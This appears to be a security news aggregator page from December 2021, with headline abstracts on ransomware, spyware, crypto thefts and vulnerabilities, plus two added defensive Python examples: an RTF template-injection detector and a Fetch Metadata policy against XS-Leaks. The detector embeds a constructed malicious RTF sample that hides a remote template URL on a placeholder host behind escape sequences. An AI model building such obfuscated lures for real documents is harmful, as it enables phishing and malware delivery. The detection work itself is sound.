Abstract Scammers monitor every tweet containing requests for support on MetaMask, TrustWallet, and other popular crypto wallets, and respond to them with scam links in just seconds.

BleepingComputer

December 07, 2021 – Attack

Nordic Choice Hotels hit by Conti ransomware, no ransom demand yet Full Text

Abstract Nordic Choice Hotels has now confirmed a cyber attack on its systems from the Conti ransomware group. Although there is no indication of card or payment information being affected, information pertaining to guest bookings was potentially leaked.

BleepingComputer

December 6, 2021 – Criminals

Cuba Ransomware Gang Hauls in $44M in Payouts Full Text

Abstract The gang is using a variety of tools and malware to carry out attacks in volume on critical sectors, the FBI warned.

Threatpost

December 6, 2021 – Privacy

Pegasus Spyware Infects U.S. State Department iPhones Full Text

Abstract It’s unknown who’s behind the cyberattacks against at least nine employees’ iPhones, who are all involved in Ugandan diplomacy.

Threatpost

December 06, 2021 – Solution

Latest Firefox 95 Includes RLBox Sandboxing to Protect Browser from Malicious Code Full Text

Abstract Mozilla is beginning to roll out Firefox 95 with a new sandboxing technology called RLBox that prevents untrusted code and other security vulnerabilities from causing "accidental defects as well as supply-chain attacks." Dubbed "RLBox" and implemented in collaboration with researchers at the University of California San Diego and the University of Texas, the improved protection mechanism is designed to harden the web browser against potential weaknesses in off-the-shelf libraries used to render audio, video, fonts, images, and other content. To that end, Mozilla is incorporating "fine-grained sandboxing" into five modules, including its Graphite font rendering engine, Hunspell spell checker, Ogg multimedia container format, Expat XML parser, and Woff2 web font compression format. The framework uses WebAssembly, an open standard that defines a portable binary-code format for executable programs that can be run on modern web browsers, to i

The Hacker News

December 06, 2021 – APT

Microsoft seizes sites used by APT15 Chinese state hackers Full Text

Abstract Microsoft seized today dozens of malicious sites used by the Nickel China-based hacking group to target organizations in the US and 28 other countries worldwide.

BleepingComputer

December 6, 2021 – Vulnerabilities

Kafdrop flaw allows data from Kafka clusters to be exposed Internet-wide Full Text

Abstract Researchers at Spectral discovered a security flaw in Kafdrop, a popular open-source UI and management interface for Apache Kafka clusters, that has been downloaded more than 20 million times.

Help Net Security

December 06, 2021 – Hacker

Russian group behind SolarWinds incident ramping up hacking efforts, analysis says Full Text

Abstract The Russian government-linked hacking group behind one of the biggest cyber espionage incidents in U.S. history has only intensified its hacking efforts in the year since, research released Monday found.

The Hill

December 06, 2021 – Cryptocurrency

Malicious KMSPico Windows Activator Stealing Users’ Cryptocurrency Wallets Full Text

Abstract Users looking to activate Windows without using a digital license or a product key are being targeted by tainted installers to deploy malware designed to plunder credentials and other information in cryptocurrency wallets. The malware, dubbed "CryptBot," is an information stealer capable of obtaining credentials for browsers, cryptocurrency wallets, browser cookies, credit cards, and capturing screenshots from the infected systems. Deployed via cracked software, the latest attack involves the malware masquerading as KMSPico. KMSPico is an unofficial tool that's used to illicitly activate the full features of pirated copies of software such as Microsoft Windows and Office suite without actually owning a license key. "The user becomes infected by clicking one of the malicious links and downloading either KMSPico, Cryptbot, or another malware without KMSPico," Red Canary researcher Tony Lambert said in a report published last week. "The adversaries

The Hacker News

December 6, 2021 – Education

How Crowd-Forecasting Might Decrease the Cybersecurity Knowledge Deficit Full Text

Abstract Can we apply the techniques of crowd-forecasting for better cybersecurity?

Lawfare

December 6, 2021 – APT

Nobelium APT targets French orgs, French ANSSI agency warns Full Text

Abstract The French national cybersecurity agency ANSSI (Agence Nationale de la Sécurité des Systèmes d'Information) said that the Russia-linked Nobelium APT group has been targeting French organizations since February 2021...

Security Affairs

December 6, 2021 – Cryptocurrency

Crypto-Exchange BitMart to Pay Users for $200M Theft Full Text

Abstract BitMart confirmed it had been drained of ~$150 million in cryptocurrency assets, but a blockchain security firm said it’s closer to $200 million.

Threatpost

December 06, 2021 – Privacy

France warns of Nobelium cyberspies attacking French orgs Full Text

Abstract The French national cyber-security agency ANSSI said today that the Russian-backed Nobelium hacking group behind last year's SolarWinds hack has been targeting French organizations since February 2021.

BleepingComputer

December 6, 2021 – Vulnerabilities

Critical vulnerabilities in open source forum software NodeBB could lead to RCE Full Text

Abstract Critical vulnerabilities in the JavaScript-based open source forum platform NodeBB could allow attackers to steal private information and access admin accounts, researchers have warned.

The Daily Swig

December 06, 2021 – Hacker

Microsoft disrupts Chinese hacking group targeting organizations in dozens of countries Full Text

Abstract Microsoft on Monday announced that a federal court had granted a request to allow the company to seize websites being used by a China-based hacking group that was targeting organizations in the United States and 28 other nations.

The Hill

December 06, 2021 – Education

Vulnerability Scanning Frequency Best Practices Full Text

Abstract So you've decided to set up a vulnerability scanning programme, great. That's one of the best ways to avoid data breaches. How often you should run your scans, though, isn't such a simple question. The answers aren't the same for every type of organization or every type of system you're scanning. This guide will help you understand the questions you should be asking and help you come up with the answers that are right for you. How often should vulnerability scans be run? A lot of the advice below depends on what exactly you're scanning. If you're not sure about that yet, check out this comprehensive vulnerability scanning guide. Once you've decided which systems should be in scope, and what type of scanner you need, you're ready to start scanning. So how often should you ideally be running vulnerability scans? Here are five strategies to consider, and we'll discuss in which scenarios they work best: Change-based Hygiene-based Complian

The Hacker News

December 6, 2021 – Government

How the President Can Shape the Role and Oversight of the National Cyber Director Full Text

Abstract The national cyber director’s lack of independent legal authority, combined with Senate confirmation, gives the president broad latitude to shape this role and authority within the executive branch.

Lawfare

December 6, 2021 – Attack

330 SPAR stores close or switch to cash-only payments after a cyberattack Full Text

Abstract A cyber attack hit the international supermarket franchise SPAR forcing 330 shops in North East England to shut down. A cyberattack hit the international supermarket franchise SPAR impacting the operations at 330 shops in North East England. Many...

Security Affairs

December 6, 2021 – General

Are You Guilty of These 8 Network-Security Bad Practices? Full Text

Abstract Tony Lauro, director of Security Technology & Strategy at Akamai, discusses VPNs, RDP, flat networks, BYOD and other network-security bugbears.

Threatpost

December 06, 2021 – Outage

Hundreds of SPAR stores shut down, switch to cash after cyberattack Full Text

Abstract Approximately 330 SPAR shops in northern England face severe operational problems following a weekend cyberattack, forcing many stores to close or switch to cash-only payments.

BleepingComputer

December 6, 2021 – Cryptocurrency

Malicious Version of KMSPico Windows Activator Used to Steal Users’ Cryptocurrency Wallets Full Text

Abstract Red Canary noted that it is not just individuals who use KMSPico to fraudulently activate Windows; it has also observed various IT departments using the tool, which makes the tainted installers a bigger threat in such cases.

Neowin

December 06, 2021 – Government

Israel tightening cyber exports after scandals Full Text

Abstract Israel is tightening its guidelines for cyber exports following a number of incidents linked to the Israeli spyware company NSO Group.

The Hill

December 06, 2021 – Criminals

Hackers Steal $200 Million Worth of Cryptocurrency Tokens from BitMart Exchange Full Text

Abstract Cryptocurrency trading platform BitMart has disclosed a "large-scale security breach" that it blamed on a stolen private key, resulting in the theft of more than $150 million in various cryptocurrencies. The breach is said to have impacted two of its hot wallets on the Ethereum (ETH) blockchain and the Binance smart chain (BSC). The company noted that the wallets carried only a "small percentage" of the assets. Hot wallets, as opposed to their cold counterparts, are connected to the internet and allow cryptocurrency owners to receive and send tokens. Blockchain security and data analytics company PeckShield estimated the total loss to be around $200 million, calling the whole chain of events "Pretty straightforward: transfer-out, swap, and wash." "This security breach was mainly caused by a stolen private key that had two of our hot wallets compromised," BitMart's chief executive Sheldon Xia said in a series of tweets sent

The Hacker News

December 6, 2021 – Attack

DMEA Colorado electric utility hit by a disruptive cyberattack Full Text

Abstract A ransomware attack hit an electric utility in Colorado causing a significant disruption and damage. The Delta-Montrose Electric Association (DMEA) is a local electric cooperative located in Colorado, it is part of Touchstone Energy Cooperatives. The...

Security Affairs

December 6, 2021 – Government

Cyber Command Publicly Joins Fight Against Ransomware Groups   Full Text

Abstract U.S. military acknowledges targeting cybercriminals who launch attacks on U.S. companies.

Threatpost

December 06, 2021 – Solution

WhatsApp adds default disappearing messages for new chats Full Text

Abstract WhatsApp announced today that it had expanded the privacy control features with the addition of default disappearing messages for all newly initiated chats.

BleepingComputer

December 6, 2021 – APT

RTF Template Injection Technique Becomes Popular Among APT Groups Full Text

Abstract Proofpoint identified three state-sponsored threat actors from India, Russia, and China adopting RTF template injection in their phishing campaigns. The adoption of this technique has made these groups' attacks much harder to detect and prevent. Therefore, organizations are suggested to d ...

Cyware Alerts - Hacker News
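RTF template injection works by planting a `{\*\template ...}` destination in the RTF header that points at a remote URL or UNC path, so Word fetches and loads the attacker's template when the file is opened; the URL is often split across `\'hh` hex and `\uN?` unicode escapes to defeat naive string matching. The following detector is an added example written for this page, not code from Proofpoint or from the article; the two RTF samples are constructed, and the host `example.test` and the `.dotm` names are placeholders.

```python
import re

# {\*\template ...} is the RTF destination Word resolves to load an attached template;
# a remote URL or UNC path here is the template-injection indicator.
TEMPLATE_GROUP = re.compile(rb"\{\\\*\\template\b", re.IGNORECASE)
REMOTE_TARGET = re.compile(r"^(https?://|ftp://|file://|\\\\)", re.IGNORECASE)


def _group_body(data: bytes, start: int) -> bytes:
    """Return the bytes inside the brace group opening at data[start] (balanced, escape-aware)."""
    depth, i = 0, start
    while i < len(data):
        c = data[i]
        if c == 0x5C:            # backslash: next byte is a control symbol or escaped brace
            i += 2
            continue
        if c == 0x7B:            # '{'
            depth += 1
        elif c == 0x7D:          # '}'
            depth -= 1
            if depth == 0:
                return data[start + 1:i]
        i += 1
    return data[start + 1:]     # unterminated group: take what is there


def _decode_destination(body: bytes) -> str:
    """Decode a destination group, resolving \\'hh hex and \\uN? unicode escapes."""
    out, i, n = [], 0, len(body)
    while i < n:
        c = body[i:i + 1]
        if c != b"\\":
            if c not in b"\r\n":
                out.append(c)
            i += 1
            continue
        nxt = body[i + 1:i + 2]
        if nxt == b"'":                         # \'hh : one raw byte
            out.append(bytes([int(body[i + 2:i + 4], 16)]))
            i += 4
        elif nxt in (b"\\", b"{", b"}"):       # escaped literal
            out.append(nxt)
            i += 2
        elif nxt.isalpha():                     # control word: \template, \ansi, \uN ...
            m = re.match(rb"\\([a-zA-Z]+)(-?\d+)?", body[i:])
            word, num = m.group(1), m.group(2)
            i += m.end()
            if body[i:i + 1] == b" ":           # optional delimiter space
                i += 1
            if word == b"u" and num:            # \uN? : signed 16-bit code point + fallback char
                out.append(chr(int(num) % 65536).encode("utf-8"))
                i += 1                          # skip the fallback character
        else:                                   # other control symbol such as \* or \~
            i += 2
    return b"".join(out).decode("utf-8", "replace").strip()


def find_template_injection(rtf: bytes) -> list[str]:
    """Return decoded remote template targets found in an RTF document (empty list = clean)."""
    if not rtf.lstrip().startswith(b"{\\rtf"):
        return []
    hits = []
    for m in TEMPLATE_GROUP.finditer(rtf):
        target = _decode_destination(_group_body(rtf, m.start()))
        if REMOTE_TARGET.match(target):
            hits.append(target)
    return hits


# Constructed samples (not real captures): the URL is hidden behind hex and unicode escapes.
MALICIOUS_RTF = (
    b"{\\rtf1\\ansi\\deff0"
    b"{\\*\\template \\'68\\'74\\'74\\'70://\\u101?xample.test/\\'6c\\'75\\'72\\'65.dotm}"
    b"{\\fonttbl{\\f0 Arial;}}\\f0 Quarterly report attached.\\par}"
)
BENIGN_RTF = b"{\\rtf1\\ansi{\\*\\template C:\\\\Users\\\\me\\\\Normal.dotm}\\par Hello}"

if __name__ == "__main__":
    for name, doc in (("malicious", MALICIOUS_RTF), ("benign", BENIGN_RTF)):
        print(name, find_template_injection(doc))
```

A local template path, as in the benign sample, is normal for documents saved from a customised template; only remote URLs and UNC paths are reported, since those are what cause an outbound fetch on open.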

December 06, 2021 – Breach

Over $150 million stolen by hackers from cryptocurrency exchange BitMart Full Text

Abstract Hackers stole at least $150 million from cryptocurrency exchange BitMart as part of what the company described Monday as a “large-scale security breach.”

The Hill

December 06, 2021 – Vulnerabilities

14 New XS-Leaks (Cross-Site Leaks) Attacks Affect All Modern Web Browsers Full Text

Abstract Researchers have discovered 14 new types of cross-site data leakage attacks against a number of modern web browsers, including Tor Browser, Mozilla Firefox, Google Chrome, Microsoft Edge, Apple Safari, and Opera, among others. Collectively known as "XS-Leaks," the browser bugs enable a malicious website to harvest personal data from its visitors as they interact with other websites in the background without the targets' knowledge. The findings are the result of a comprehensive study of cross-site attacks undertaken by a group of academics from Ruhr-Universität Bochum (RUB) and Niederrhein University. "XS-Leaks bypass the so-called same-origin policy, one of a browser's main defences against various types of attacks," the researchers said in a statement. "The purpose of the same-origin policy is to prevent information from being stolen from a trusted website. In the case of XS-Leaks, attackers can nevertheless recognize individual, small details

The Hacker News

December 6, 2021 – Hacker

Threat actors stole more than $150 million worth of cryptocurrency tokens from BitMart platform Full Text

Abstract Threat actors stole more than $150 million in various cryptocurrencies from the cryptocurrency trading platform BitMart. Cryptocurrency trading platform BitMart has disclosed a security breach in which threat actors stole more than $150 million in various cryptocurrencies....

Security Affairs

December 06, 2021 – Hacker

Russian hacking group uses new stealthy Ceeloader malware Full Text

Abstract The Nobelium hacking group continues to breach government and enterprise networks worldwide by targeting their cloud and managed service providers and using a new custom "Ceeloader" malware.

BleepingComputer

December 6, 2021 – Privacy

American diplomats’ iPhones reportedly compromised by NSO Group intrusion software Full Text

Abstract The Apple iPhones of at least nine US State Department officials were compromised by an unidentified entity using NSO Group's Pegasus spyware, according to a report published Friday by Reuters.

The Register

December 6, 2021 – Hacker

Hackers are sending receipts with anti-work messages to businesses’ printers Full Text

Abstract Hackers are targeting printers of businesses around the world to print ‘anti-work’ slogans pushing workers to demand better pay. Multiple employees are sharing on Twitter and Reddit the images of anti-work messages sent to the printers of their...

Security Affairs

December 6, 2021 – General

ASIC says financial market cyber resiliency remained steady but fell short of target Full Text

Abstract Firms in Australia's financial market have continued to be resilient against cyber threats, with improvement rates in cyber resiliency remaining steady, the ASIC reported on Monday.

ZDNet

December 6, 2021 – Malware

Magnat malvertising campaigns spreads malicious Chrome extensions, backdoors and info stealers Full Text

Abstract Experts spotted a series of malvertising campaigns using fake installers of popular apps and games to deliver a backdoor and a malicious Chrome extension. Talos researchers spotted a series of malvertising campaigns using fake installers of popular...

Security Affairs

December 6, 2021 – Vulnerabilities

Millions of Users Impacted by Discovery of Hundreds of Vulnerabilities in Common Wi-Fi Routers Full Text

Abstract The router affected by the most flaws is the TP-Link Archer AX6000 (32 vulnerabilities), followed by the Synology RT-2600ac with 30 issues and the Netgear Nighthawk AX12 with 29 flaws.

Security Affairs

December 6, 2021 – Malware

Emotet Spreads Again with Fake App Installers Full Text

Abstract Threat actors behind Emotet are penetrating networks through malicious Windows App Installer packages that imitate Adobe PDF software. The campaign uses stolen reply-chain emails that appear to be replies to an existing conversation. Once the install button is clicked, the installer downloads ...

Cyware Alerts - Hacker News

December 05, 2021 – Phishing

As Twitter removes blue badges for many, phishing targets verified accounts Full Text

Abstract A new phishing campaign has been targeting verified Twitter accounts, as seen by BleepingComputer. The phishing campaign follows Twitter's recent removal of the checkmark from a number of verified accounts, citing that these were ineligible for the legendary status, and verified in error.

BleepingComputer

December 05, 2021 – Malware

Malicious Excel XLL add-ins push RedLine password-stealing malware Full Text

Abstract Cybercriminals are spamming website contact forms and discussion forums to distribute Excel XLL files that download and install the RedLine password and information-stealing malware.

BleepingComputer

December 5, 2021 – Cryptocurrency

Tor2mine Cryptominer Evolves to Pose a Bigger Threat Full Text

Abstract Tor2Mine, a cryptominer which has been under active development since 2019, uses a PowerShell script to disable anti-malware solutions, deploy the payload, and steal Windows credentials. 

Cyware Alerts - Hacker News

December 5, 2021 – General

Security Affairs newsletter Round 343 Full Text

Abstract A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here....

Security Affairs

December 05, 2021 – Phishing

Convincing Microsoft phishing uses fake Office 365 spam alerts Full Text

Abstract A persuasive and ongoing series of phishing attacks are using fake Office 365 notifications asking the recipients to review blocked spam messages, with the end goal of stealing their Microsoft credentials.

BleepingComputer

December 5, 2021 – Vulnerabilities

Hundreds of vulnerabilities in common Wi-Fi routers affect millions of users Full Text

Abstract Researchers discovered a total of 226 potential security vulnerabilities in nine popular Wi-Fi routers from known manufacturers. Security researchers and editors with the German IT magazine CHIP have discovered 226 potential security defects in nine...

Security Affairs

December 05, 2021 – Phishing

New Twitter phishing campaign targets verified accounts Full Text

Abstract A new phishing campaign has been targeting verified Twitter accounts, as seen by BleepingComputer. The phishing campaign follows Twitter's recent removal of the checkmark from a number of verified accounts, citing that these were ineligible for the legendary status, and verified in error.

BleepingComputer

December 5, 2021 – Government

German BSI agency warns of ransomware attacks over Christmas holidays Full Text

Abstract German BSI warns of ransomware attacks over the Christmas and end-of-year holidays, fearing Emotet return and attacks on Microsoft Exchange servers. The German cybersecurity authority BSI warns of ransomware attacks over the Christmas holidays, fearing...

Security Affairs

December 04, 2021 – Privacy

Pegasus Spyware Reportedly Hacked iPhones of U.S. State Department and Diplomats Full Text

Abstract Apple reportedly notified several U.S. Embassy and State Department employees that their iPhones may have been targeted by an unknown assailant using state-sponsored spyware created by the controversial Israeli company NSO Group, according to multiple reports from Reuters and The Washington Post. At least 11 U.S. Embassy officials stationed in Uganda or focusing on issues pertaining to the country are said to have been singled out using iPhones registered to their overseas phone numbers, although the identity of the threat actors behind the intrusions, or the nature of the information sought, remains unknown as yet. The attacks, which were carried out in the last several months, mark the first known time the sophisticated surveillance software has been put to use against U.S. government employees. NSO Group is the maker of Pegasus, military-grade spyware that allows its government clients to stealthily plunder files and photos, eavesdrop on conversations, and track the whereabou

The Hacker News

December 4, 2021 – Ransomware

Thieflock and Yanluowang Ransomware Share Same Genes Full Text

Abstract Symantec has reported a link between Thieflock and Yanluowang ransomware operations. The latter recently picked up its pace to target financial companies in the U.S. Researchers believe that the attackers are highly attack-oriented because the ransomware behavior hasn't altered since its discovery ...

Cyware Alerts - Hacker News

December 4, 2021 – Government

FBI: Cuba ransomware group hit 49 critical infrastructure organizations Full Text

Abstract The FBI has released a new notice about the Cuba ransomware, explaining that the group has attacked "49 entities in five critical infrastructure sectors" and made at least $43.9 million in ransom payments.

ZDNet

December 04, 2021 – Malware

Malicious KMSPico installers steal your cryptocurrency wallets Full Text

Abstract Threat actors are distributing altered KMSpico installers to infect Windows devices with malware that steals cryptocurrency wallets.

BleepingComputer

December 4, 2021 – APT

Determined APT is exploiting ManageEngine ServiceDesk Plus vulnerability Full Text

Abstract An APT group is leveraging a critical vulnerability (CVE-2021-44077) in Zoho ManageEngine ServiceDesk Plus to compromise organizations in a variety of sectors, including defense and tech.

Help Net Security

December 4, 2021 – Criminals

Cuba ransomware gang hacked 49 US critical infrastructure organizations Full Text

Abstract The FBI has revealed that the Cuba ransomware gang breached the networks of at least 49 US critical infrastructure organizations. A flash alert published by the FBI has reported that the Cuba ransomware gang breached the networks of at least 49 US critical...

Security Affairs

December 4, 2021 – Hacker

Hackers steal $120m from Badger Defi and $30m from MonoX Full Text

Abstract Two DeFi projects BadgerDAO and MonoX are the latest victims of security breaches in which hundreds of millions of dollars worth of cryptocurrency has been stolen by hackers.

Hackread

December 4, 2021 – Government

CISA warns of vulnerabilities in Hitachi Energy products Full Text

Abstract CISA has released six advisories to warn organizations about security vulnerabilities affecting Hitachi Energy products. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published six advisories to inform organizations about the availability...

Security Affairs

December 03, 2021 – Breach

State Department employee phones hacked through NSO Group spyware: report Full Text

Abstract The phones of at least nine State Department employees were recently hacked through the use of spyware from Israeli company NSO Group, a report published Friday found.

The Hill

December 3, 2021 – Education

Cybersecurity for Idiots Full Text

Abstract One of cybersecurity’s major challenges is cyberstupidity, and regulators struggle to keep pace with rapidly changing technologies. Adopting a cybersecurity approach conceptually modeled on tort’s negligence per se doctrine, regulators can reduce widespread failures.

Lawfare

December 03, 2021 – Attack

Warning: Yet Another Zoho ManageEngine Product Found Under Active Attacks Full Text

Abstract Enterprise software provider Zoho on Friday warned that a newly patched critical flaw in its Desktop Central and Desktop Central MSP is being actively exploited by malicious actors, marking the third security vulnerability in its products to be abused in the wild in a span of four months. The issue, assigned the identifier CVE-2021-44515, is an authentication bypass vulnerability that could permit an adversary to circumvent authentication protections and execute arbitrary code in the Desktop Central MSP server. "If exploited, the attackers can gain unauthorized access to the product by sending a specially crafted request leading to remote code execution," Zoho cautioned in an advisory. "As we are noticing indications of exploitation of this vulnerability, we strongly advise customers to update their installations to the latest build as soon as possible." The company has also made available an Exploit Detection Tool that will help customers identify sig

The Hacker News

December 03, 2021 – Hacker

Researchers Detail How Pakistani Hackers Targeting Indian and Afghan Governments Full Text

Abstract A Pakistani threat actor successfully socially engineered a number of ministries in Afghanistan and a shared government computer in India to steal sensitive Google, Twitter, and Facebook credentials from its targets and stealthily obtain access to government portals. Malwarebytes' latest findings go into detail about the new tactics and tools adopted by the APT group known as SideCopy, which is so-called because of its attempts to mimic the infection chains associated with another group tracked as SideWinder and mislead attribution. "The lures used by SideCopy APT are usually archive files that have embedded one of these files: LNK, Microsoft Publisher or Trojanized Applications," Malwarebytes researcher Hossein Jazi said, adding the embedded files are tailored to target government and military officials based in Afghanistan and India. The revelation comes close on the heels of disclosures that Meta took steps to block malicious activities carried out by the

The Hacker News

December 03, 2021 – Malware

New Malvertising Campaigns Spreading Backdoors, Malicious Chrome Extensions Full Text

Abstract A series of malicious campaigns have been leveraging fake installers of popular apps and games such as Viber, WeChat, NoxPlayer, and Battlefield as a lure to trick users into downloading a new backdoor and an undocumented malicious Google Chrome extension with the goal of stealing credentials and data stored in the compromised systems as well as maintaining persistent remote access. Cisco Talos attributed the malware payloads to an unknown actor that goes by the alias "magnat," noting that "these two families have been subject to constant development and improvement by their authors." The attacks are believed to have commenced in late 2018, with intermittent activity observed towards the end of 2019 and through early 2020, followed by fresh spikes since April 2021, while mainly singling out users in Canada, followed by the U.S., Australia, Italy, Spain, and Norway. A noteworthy aspect of the intrusions is the use of malvertising as a means to strike individua

The Hacker News

December 03, 2021 – Ransomware

The Week in Ransomware - December 3rd 2021 - Seizing Bitcoin Full Text

Abstract For this week's 'Week in Ransomware' article we have included the latest ransomware news over the past two weeks.

BleepingComputer

December 03, 2021 – Government

Why Everyone Needs to Take the Latest CISA Directive Seriously Full Text

Abstract Government agencies publish notices and directives all the time. Usually, these are only relevant to government departments, which means that nobody else really pays attention. It's easy to see why you would assume that a directive from CISA just doesn't relate to your organization. But, in the instance of the latest CISA directive, that would be making a mistake. In this article, we explain why, even if you're in the private or non-government sector, you should nonetheless take a close look at CISA Binding Operational Directive 22-01. We outline why CISA was forced to issue this directive, and why that firm action has implications for all organizations – inside and outside of government. Acting on cybersecurity issues isn't as simple as flicking a switch, of course, so keep reading to find out how you can address the core issue behind the CISA directive. Okay, so what exactly is a CISA directive? Let's take a step back to gain some context. Just like any organ

The Hacker News

December 03, 2021 – Breach

US State Dept employees’ phones hacked using NSO spyware Full Text

Abstract Apple has warned US Department of State employees that their iPhones have been hacked by unknown attackers using an iOS exploit dubbed ForcedEntry to deploy Pegasus spyware developed by Israeli surveillance firm NSO Group.

BleepingComputer

December 3, 2021 – Criminals

Hackers Steal $120 Million from Badger DeFi Platform Full Text

Abstract Hackers have stolen an estimated $120 million worth of Bitcoin and Ether assets from Badger, a decentralized finance (DeFi) platform that allows users to borrow, loan, and speculate on cryptocurrency price variations.

The Record

December 03, 2021 – Malware

New Payment Data Stealing Malware Hides in Nginx Process on Linux Servers Full Text

Abstract E-commerce platforms in the U.S., Germany, and France have come under attack from a new form of malware that targets Nginx servers in an attempt to masquerade its presence and slip past detection by security solutions. "This novel code injects itself into a host Nginx application and is nearly invisible," Sansec Threat Research team said in a new report. "The parasite is used to steal data from eCommerce servers, also known as 'server-side Magecart.'" Free and open-source, Nginx is a web server that can also be used as a reverse proxy, load balancer, mail proxy, and HTTP cache. NginRAT, as the advanced malware is called, works by hijacking a host Nginx application to embed itself into the webserver process. The remote access trojan itself is delivered via CronRAT, another piece of malware the Dutch cybersecurity firm disclosed last week as hiding its malicious payloads in cron jobs scheduled to execute on February 31st, a non-existent ca

The Hacker News

December 3, 2021 – Privacy

NSO Group spyware used to compromise iPhones of 9 US State Dept officials Full Text

Abstract Apple warns that the mobile devices of at least nine US Department of State employees were compromised with NSO Group's Pegasus spyware. The iPhones of at least nine US State Department officials were compromised with the NSO Group's spyware Pegasus. The...

Security Affairs

December 03, 2021 – Malware

Fake support agents call victims to install Android banking malware Full Text

Abstract The BRATA Android remote access trojan (RAT) has been spotted in Italy, with threat actors calling victims of SMS attacks to steal their online banking credentials.

BleepingComputer

December 3, 2021 – Phishing

Now Anyone can Phish with Phishing Kits Full Text

Abstract Phishing kits enable non-technical criminals to readily leverage new techniques. These kits contain a set of tools that allow wannabe criminals to build and launch their own phishing campaigns.

Cyware Alerts - Hacker News

December 3, 2021 – Hacker

KAX17 threat actor is attempting to deanonymize Tor users running thousands of rogue relays Full Text

Abstract Since 2017, an unknown threat actor has run thousands of malicious Tor relay servers in the attempt to unmask Tor users. A mysterious threat actor, tracked as KAX17, has run thousands of malicious Tor relay servers since 2017 in an attempt to deanonymize...

Security Affairs

December 03, 2021 – Government

FBI: Cuba ransomware breached 49 US critical infrastructure orgs Full Text

Abstract The Federal Bureau of Investigation (FBI) has revealed that the Cuba ransomware gang has compromised the networks of at least 49 organizations from US critical infrastructure sectors.

BleepingComputer

December 3, 2021 – Vulnerabilities

Critical Flaw in NSS Cryptographic Library Affects Several Popular Applications Full Text

Abstract The security defect may also impact applications that employ NSS for validating certificates, or for additional CRL, OCSP, TLS, or X.509 functionality, depending on how NSS is configured.

Security Week

December 3, 2021 – Criminals

Threat actors stole $120 M in crypto from BadgerDAO DeFi platform Full Text

Abstract Threat actors stole $120 million in cryptocurrencies from multiple wallets connected to the decentralized finance platform BadgerDAO. Threat actors this week have hacked the decentralized finance platform BadgerDAO and have stolen $120.3 million in crypto...

Security Affairs

December 03, 2021 – Attack

Researchers discover 14 new data-stealing web browser attacks Full Text

Abstract IT security researchers from Ruhr-Universität Bochum (RUB) and the Niederrhein University of Applied Sciences have discovered 14 new types of 'XS-Leak' cross-site leak attacks against modern web browsers, including Google Chrome, Microsoft Edge, Safari, and Mozilla Firefox.

BleepingComputer
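Both XS-Leaks items above describe the same problem: the same-origin policy stops a cross-site page from reading a response, but not from observing side effects of loading it (timing, frame counts, error events, cache state). The server-side mitigation that the XS-Leaks research community recommends is to refuse to serve state-dependent responses to cross-site requests at all, using the browser-supplied Fetch Metadata headers, and to send the isolation headers that cut off framing and window references. The handler below is an added example written for this page, not code from the RUB/Niederrhein researchers or from either article; it implements the commonly published resource-isolation policy, deliberately made stricter by also refusing cross-site `iframe`/`frame` destinations, and the request records at the bottom are constructed, not captured traffic.

```python
# Fetch-Metadata-based resource isolation against XS-Leaks (added example).
SAFE_SITES = {"same-origin", "same-site", "none"}   # "none" = typed URL, bookmark, etc.
# Destinations whose responses a cross-site page can observe or embed. The published
# minimal policy lists only object/embed; iframe/frame are added here as defence in depth
# against frame-counting leaks, in addition to the framing headers below.
REFUSED_DESTS = {"object", "embed", "iframe", "frame"}

# Response headers that close the remaining cross-site observation channels:
# window references (COOP), cross-origin inclusion (CORP), and framing (XFO / CSP).
ISOLATION_HEADERS = {
    "Cross-Origin-Opener-Policy": "same-origin",
    "Cross-Origin-Resource-Policy": "same-origin",
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "frame-ancestors 'none'",
    "Vary": "Sec-Fetch-Site, Sec-Fetch-Mode, Sec-Fetch-Dest",
}


def allow_request(method: str, headers: dict[str, str]) -> bool:
    """Decide whether a request may receive a state-dependent (authenticated) response."""
    h = {k.lower(): v.strip().lower() for k, v in headers.items()}
    site = h.get("sec-fetch-site")
    if site is None:
        return True          # browser without Fetch Metadata: the policy cannot decide
    if site in SAFE_SITES:
        return True
    # Cross-site: only a plain top-level GET navigation is served, because the initiating
    # site cannot read the resulting document. fetch/XHR/img/script/iframe loads are refused.
    return (h.get("sec-fetch-mode") == "navigate"
            and method.upper() == "GET"
            and h.get("sec-fetch-dest") not in REFUSED_DESTS)


def handle(method: str, headers: dict[str, str]) -> tuple[int, dict[str, str]]:
    """Minimal handler: 403 for isolated cross-site requests, else 200 with isolation headers.
    Returning the same generic 403 regardless of login state keeps the refusal itself from
    becoming a leak oracle."""
    if not allow_request(method, headers):
        return 403, {"Vary": ISOLATION_HEADERS["Vary"]}
    return 200, dict(ISOLATION_HEADERS)


# Constructed requests (not captured traffic), labelled the way a browser would label them.
EXAMPLE_REQUESTS = [
    ("GET", {"Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty"}),
    ("GET", {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "no-cors", "Sec-Fetch-Dest": "script"}),
    ("GET", {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "document"}),
    ("GET", {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "iframe"}),
]

if __name__ == "__main__":
    for method, hdrs in EXAMPLE_REQUESTS:
        status, _ = handle(method, hdrs)
        print(status, hdrs["Sec-Fetch-Site"], hdrs["Sec-Fetch-Mode"], hdrs["Sec-Fetch-Dest"])
```

The `Vary` header matters because a shared cache must not hand a cross-site requester a copy of a response that was produced for a same-origin one; and because the policy falls open for browsers that send no `Sec-Fetch-*` headers, the isolation headers remain the backstop rather than an optional extra.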

December 3, 2021 – Business

Security Analytics Startup Panther Labs Scores $120M Investment Full Text

Abstract Panther Labs, an early-stage startup that specializes in detection and response analytics, has raised $120 million in a new Series B round of funding led by Coatue Management.

Security Week

December 3, 2021 – Covid-19

Watch out for Omicron COVID-19-themed phishing messages! Full Text

Abstract Threat actors have started to exploit the interest in the Omicron COVID-19 variant and are using it as a lure in phishing campaigns. Crooks have already started exploiting the interest in the Omicron COVID-19 variant and are using it as a lure in phishing...

Security Affairs

December 03, 2021 – Vulnerabilities

Zoho: Patch new ManageEngine bug exploited in attacks ASAP Full Text

